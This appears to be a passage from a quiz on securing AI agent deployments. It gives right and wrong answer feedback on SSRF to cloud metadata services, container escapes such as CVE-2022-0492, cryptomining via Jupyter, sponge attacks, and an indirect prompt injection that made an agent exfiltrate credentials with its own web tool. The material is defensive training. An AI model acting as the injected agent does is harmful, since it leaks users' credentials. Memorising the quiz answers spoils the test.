Correct. Required headers stop SSRF via image tags or browser redirects because those mechanisms cannot set arbitrary headers. An agent's HTTP tool call is a direct programmatic request that can include any header.

Incorrect. The required header (Metadata-Flavor: Google) is trivially settable by any agent HTTP tool. This protection only stops SSRF via uncontrolled request mechanisms like HTML img tags.

6. TeamTNT's cryptomining campaigns specifically targeted Jupyter notebook servers because:

Correct. Unauthenticated Jupyter instances accept arbitrary Python execution. TeamTNT used this to download and run XMRig, exploiting the compute resources intended for ML workloads.

Incorrect. The key vulnerability is unauthenticated code execution — Jupyter notebooks without authentication allow any visitor to run arbitrary Python, including subprocess calls that download and run miners.

7. A sponge attack against an AI agent system aims to:

Correct. Sponge attacks craft inputs that maximize model compute expenditure — increasing inference latency, exhausting rate limits, and generating cost spikes that can be weaponized against production agent deployments.

Incorrect. A sponge attack maximizes inference compute by crafting pathological inputs. It requires no code execution or credential access — just the ability to send inputs to the agent.

8. What is the primary advantage of using Firecracker microVMs over standard container runtimes (runc) for AI agent isolation?

Correct. The fundamental security advantage of Firecracker is kernel isolation. CVEs in runc, containerd, or the Linux kernel namespace implementation cannot be exploited cross-microVM because each agent's kernel is separate from the host kernel.

Incorrect. The security advantage is kernel isolation — each microVM runs its own kernel. Escape requires a hypervisor bug, not just a container runtime or kernel namespace bug.

9. Why does setting IMDSv2 hop limit to 1 block container IMDS access while preserving host-level access?

Correct. This is the elegant TTL-based enforcement mechanism: the virtual NIC traversal consumes the one allowed TTL hop, making the container PUT arrive with TTL=0 and be discarded by IMDS. Host processes communicate directly and their requests arrive with TTL=1.

Incorrect. The mechanism is TTL-based: traversing the virtual NIC decrements TTL by 1. With hop-limit=1, the container's PUT arrives at IMDS with TTL=0 and is dropped. Host processes don't traverse the virtual NIC and arrive with TTL=1.

10. gVisor interposes between the container and the host at which system boundary?

Correct. gVisor's Sentry is a user-space kernel implementation that handles container syscalls. The host kernel never receives direct syscalls from the container process, eliminating shared-kernel exploitation paths.

Incorrect. gVisor operates at the syscall boundary. Its Sentry component implements kernel syscall handling in user space, so container processes cannot directly invoke host kernel code.

11. In the 2024 PromptArmor indirect prompt injection research, credential exfiltration was accomplished by:

Correct. The PromptArmor research demonstrated that indirect prompt injection can cause an agent to use its own legitimate tools for exfiltration — making the malicious action invisible in the task output and indistinguishable from normal tool use without behavioral analysis.

Incorrect. The exfiltration used the agent's own web request tool — triggered by a prompt injection in a document the agent processed. No exploit or code execution was required; the agent's permitted capabilities were weaponized.

12. When testing an AI agent deployment for resource abuse risk, which combination of findings is most indicative of active cryptomining?

Correct. The dual signal — sustained non-event-correlated CPU plus Stratum protocol connections to known mining pool addresses — is the most reliable indicator of cryptomining in an environment where high CPU is otherwise expected.

Incorrect. High LLM token consumption with no output is more indicative of a prompt injection loop or sponge attack. Cryptomining's signature is sustained CPU without LLM API activity, combined with mining pool network connections.

13. A Kubernetes NetworkPolicy that blocks egress to 169.254.169.254 may be insufficient on its own because:

Correct. NetworkPolicy is a Kubernetes API object, but enforcement is delegated to the CNI plugin. Some CNI plugins (notably older versions or basic implementations) do not implement all NetworkPolicy features. The recommendation is to verify at the CNI dataplane level, not just apply the policy object.

Incorrect. The key limitation is CNI enforcement: NetworkPolicy objects are enforced by the CNI plugin, and not all plugins implement all features. The policy must be verified at the actual network dataplane.

14. CVE-2022-0492, which affected AI agent workloads on unpatched Kubernetes nodes, exploited which mechanism?

Correct. CVE-2022-0492 exploited the cgroup v1 release_agent mechanism — a file that the kernel executes when a cgroup becomes empty. With appropriate conditions (container with CAP_SYS_ADMIN or misconfigured user namespaces), this allowed host root execution from inside the container.

Incorrect. CVE-2022-0492 is a Linux kernel flaw in cgroup v1 release_agent — a file executed by the kernel when a cgroup empties. It enables host root access from inside a container under certain capability conditions.

15. The OWASP LLM Top 10 "Excessive Agency" vulnerability (LLM06) is directly relevant to resource abuse because:

Correct. Excessive Agency means the agent has capabilities beyond what its task requires. Every excess capability is additional abuse surface. An agent that only needs to read a database has no business with outbound HTTP, shell execution, or write access — granting those capabilities converts every successful attack into a broader incident.

Incorrect. Excessive Agency (LLM06) describes the condition of granting an agent more capabilities than necessary. From a resource abuse perspective, excess network and compute access means any attacker who influences the agent can leverage those capabilities for abuse.